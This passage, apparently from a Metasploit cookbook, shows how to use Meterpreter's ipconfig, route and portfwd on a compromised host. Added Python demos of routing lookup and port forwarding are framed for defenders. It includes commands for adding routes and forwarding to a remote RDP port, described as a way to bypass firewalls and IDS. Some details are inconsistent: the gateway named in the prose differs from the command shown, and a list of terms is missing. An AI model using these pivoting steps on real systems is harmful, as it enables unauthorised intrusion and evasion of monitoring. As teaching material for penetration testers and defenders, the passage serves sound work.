Meterpreter also provides some useful networking commands. These commands help us understand the network structure around the target. We can see whether the system is part of a LAN or is a standalone machine, and we can learn the IP range, DNS, and other details as well. Such network information becomes useful when we have to perform pivoting. Pivoting is a concept by which we can compromise other machines on the same network as our target. We will cover pivoting in the next chapter, where we focus on the advanced use of Meterpreter.
Before we get into the recipe, there are three networking terms that we will encounter here. So let us refresh our memory by looking at the following terms:
We will be using these three terms when we deal with the route command.
There are three networking commands provided by Meterpreter: ipconfig, route, and portfwd. Let us take a quick look at each of them.
The ipconfig command is used to display the TCP/IP network configuration of the target machine. For each interface it lists information such as the IP address, hardware MAC, and netmask:
meterpreter > ipconfig
Reliance
Hardware MAC: 00:00:00:00:00:00
IP Address : 115.242.228.85
Netmask : 255.255.255.255
Software Loopback Interface 1
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
As you can see, the output of ipconfig lists the various active TCP/IP configurations.
The next networking command is route. It is similar to the route command of MS-DOS. This command is used to display or modify the local IP routing table on the target machine. Executing route without arguments lists the current table:
meterpreter > route
Network routes
==============
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 115.242.228.85
115.242.228.85 255.255.255.255 115.242.228.85
127.0.0.0 255.0.0.0 127.0.0.1
127.0.0.1 255.255.255.255 127.0.0.1
127.255.255.255 255.255.255.255 127.0.0.1
192.168.56.0 255.255.255.0 192.168.56.1
192.168.56.1 255.255.255.255 192.168.56.1
192.168.56.255 255.255.255.255 192.168.56.1
224.0.0.0 240.0.0.0 127.0.0.1
224.0.0.0 240.0.0.0 192.168.56.1
224.0.0.0 240.0.0.0 115.242.228.85
255.255.255.255 255.255.255.255 127.0.0.1
255.255.255.255 255.255.255.255 192.168.56.1
255.255.255.255 255.255.255.255 115.242.228.85
Let us execute the route -h command to figure out how we can modify the table:
meterpreter > route -h
Usage: route [-h] command [args]
Supported commands:
add [subnet] [netmask] [gateway]
delete [subnet] [netmask] [gateway]
If you take a look at the output of the ipconfig command, you can see that the IP address 115.242.228.85 is the one the target uses to connect to the Internet. So we can add a route that passes the connection through 115.242.228.85 as the gateway. This can provide us with a firewall bypass on the target machine:
meterpreter > route add 192.168.56.2 255.255.255.255 192.168.56.1
Creating route 192.168.56.2/255.255.255.255 -> 192.168.56.1
Similarly, we can use the delete command to remove a route from the table.
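The routing-table logic described in this recipe, as an added example that is not from the book and not Metasploit's own code: it parses the three-column Meterpreter route listing shown above (embedded here as a constructed string; a metric column, if present on another target, is not handled), resolves a destination by longest-prefix match, the rule the target's IP stack applies, and then mirrors the route add command so you can see how a more specific /32 entry takes precedence over the existing /24. Function and variable names are the example's own.

```python
import ipaddress
from typing import List, Optional, Tuple

# Constructed sample: the table from the Meterpreter "route" output above.
# The parser assumes the three-column layout shown on this page (no metric column).
ROUTE_OUTPUT = """\
Network routes
==============

Subnet           Netmask          Gateway
------           -------          -------
0.0.0.0          0.0.0.0          115.242.228.85
115.242.228.85   255.255.255.255  115.242.228.85
127.0.0.0        255.0.0.0        127.0.0.1
127.0.0.1        255.255.255.255  127.0.0.1
127.255.255.255  255.255.255.255  127.0.0.1
192.168.56.0     255.255.255.0    192.168.56.1
192.168.56.1     255.255.255.255  192.168.56.1
192.168.56.255   255.255.255.255  192.168.56.1
224.0.0.0        240.0.0.0        127.0.0.1
224.0.0.0        240.0.0.0        192.168.56.1
224.0.0.0        240.0.0.0        115.242.228.85
255.255.255.255  255.255.255.255  127.0.0.1
255.255.255.255  255.255.255.255  192.168.56.1
255.255.255.255  255.255.255.255  115.242.228.85
"""

# One routing entry: destination network plus the gateway used to reach it.
Route = Tuple[ipaddress.IPv4Network, ipaddress.IPv4Address]


def parse_routes(text: str) -> List[Route]:
    """Turn the 'route' listing into (network, gateway) pairs; skips headers and rules."""
    routes: List[Route] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            # "subnet/netmask" form; strict=False tolerates host bits in the subnet field
            network = ipaddress.IPv4Network(f"{parts[0]}/{parts[1]}", strict=False)
            gateway = ipaddress.IPv4Address(parts[2])
        except ValueError:
            continue  # the "Subnet Netmask Gateway" header and the dashed rule
        routes.append((network, gateway))
    return routes


def add_route(routes: List[Route], subnet: str, netmask: str, gateway: str) -> None:
    """Mirror 'route add [subnet] [netmask] [gateway]' on the parsed table."""
    routes.append((ipaddress.IPv4Network(f"{subnet}/{netmask}", strict=False),
                   ipaddress.IPv4Address(gateway)))


def lookup(routes: List[Route], destination: str) -> Optional[Tuple[str, str]]:
    """Longest-prefix match: the most specific matching network wins.

    Equal-length matches (the duplicate 224.0.0.0/4 rows) keep the first one seen;
    a real stack breaks that tie with a metric that this listing does not show.
    """
    dest = ipaddress.IPv4Address(destination)
    best: Optional[Route] = None
    for network, gateway in routes:
        if dest in network and (best is None or network.prefixlen > best[0].prefixlen):
            best = (network, gateway)
    if best is None:
        return None
    return str(best[0]), str(best[1])


if __name__ == "__main__":
    table = parse_routes(ROUTE_OUTPUT)
    print(lookup(table, "8.8.8.8"))          # default route via 115.242.228.85
    print(lookup(table, "192.168.56.2"))     # the /24 entry via 192.168.56.1
    add_route(table, "192.168.56.2", "255.255.255.255", "192.168.56.1")
    print(lookup(table, "192.168.56.2"))     # now the more specific /32 entry
```

Running the script resolves an Internet address through the default route and shows the 192.168.56.2 lookup switch from the /24 entry to the /32 entry after the route add from the recipe, which is exactly the precedence a defender should expect when reviewing a host's routing table for unexpected entries.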
Let's move to the last networking command: portfwd. This command is used to forward incoming TCP and/or UDP connections to remote hosts. Consider the following example to understand port forwarding.
Consider host A, host B (in the middle), and host C. Host A needs to connect to host C in order to do something, but for some reason it cannot reach C directly, whereas host B can connect to C. If we use host B in the middle to take the connection stream from A and pass it on to C, while taking care of the connection, we say that host B is doing port forwarding.
This is how things appear on the wire: host B runs software that opens a TCP listener on one of its ports, say port 20. Host C runs a listener of its own, and host B connects to it whenever a packet arrives on port 20. So, if A sends any packet to port 20 of B, it is automatically forwarded to host C. Hence, host B is port forwarding its packets to host C.
To start port forwarding with a remote host, we first add a forwarding rule. Consider the following command line:
meterpreter > portfwd -a -L 127.0.0.1 -l 444 -h 69.54.34.38 -p 3389
Notice the different command parameters. With the -a parameter we add a new port forwarding rule. The -L parameter defines the IP address to bind the forwarded socket to. As we are running all of this on host A and want to continue our work from the same host, we set the IP address to 127.0.0.1. -l is the port number that will be opened on host A for accepting incoming connections. -h defines the IP address of host C, or any other host within the internal network. -p is the port you want to connect to on host C.
This was a simple demonstration of port forwarding. This technique is actively used to bypass firewalls and intrusion detection systems.
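The A, B, C relay described above, as an added example that is not part of the book and not Meterpreter's portfwd implementation: three loopback sockets play the three hosts, with ports chosen by the OS (an assumption made so the demo runs anywhere), and the names of the functions and of the returned fields are the example's own. The point it makes for a defender is in the returned dictionary: host C records B's outbound socket as the connecting peer, never A's, so a connection log on the far host shows the pivot, not the original client.

```python
import socket
import threading
from typing import Dict

# Constructed loopback stand-ins for the three hosts in the text:
#   host C = a service that echoes one message and records the peer address it saw
#   host B = the forwarder, the role that portfwd plays on the host in the middle
#   host A = the client, which only ever talks to B


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then pass the EOF on to dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_host_c(seen: Dict[str, tuple]) -> int:
    """Host C: accept one connection, remember who connected, echo what arrives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve() -> None:
        conn, peer = srv.accept()
        seen["peer"] = peer          # C's "log entry": the address that connected
        with conn:
            conn.sendall(conn.recv(4096))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def start_host_b(remote_host: str, remote_port: int, seen: Dict[str, tuple]) -> int:
    """Host B: the role of 'portfwd -a -L 127.0.0.1 -l <port> -h C -p <port>'.

    Accepts one inbound connection and splices it to remote_host:remote_port.
    """
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(1)

    def forward() -> None:
        client, _ = lsock.accept()
        upstream = socket.create_connection((remote_host, remote_port))
        seen["b_upstream"] = upstream.getsockname()  # the address C will see
        up = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
        up.start()
        _pump(upstream, client)
        up.join()
        client.close()
        upstream.close()
        lsock.close()

    threading.Thread(target=forward, daemon=True).start()
    return lsock.getsockname()[1]


def run_demo(message: bytes = b"hello via the pivot") -> Dict[str, object]:
    """Host A sends a message to B's listener and reads back C's echo."""
    seen: Dict[str, tuple] = {}
    c_port = start_host_c(seen)
    b_port = start_host_b("127.0.0.1", c_port, seen)
    with socket.create_connection(("127.0.0.1", b_port)) as a:
        a_addr = a.getsockname()
        a.sendall(message)
        a.shutdown(socket.SHUT_WR)
        reply = b""
        while True:
            chunk = a.recv(4096)
            if not chunk:
                break
            reply += chunk
    return {
        "reply": reply,
        "a_addr": a_addr,                       # the socket A actually used
        "peer_seen_by_c": seen["peer"],         # what C's connection log records
        "b_upstream_addr": seen["b_upstream"],  # B's outbound socket
    }


if __name__ == "__main__":
    print(run_demo())
```

The echo coming back proves the stream crossed both hops, and peer_seen_by_c equals b_upstream_addr rather than a_addr: the far host has no record of A at all. That is why correlating connection logs on the internal host with outbound connections on the suspected pivot, rather than looking for the original client's address, is the practical way to spot this technique.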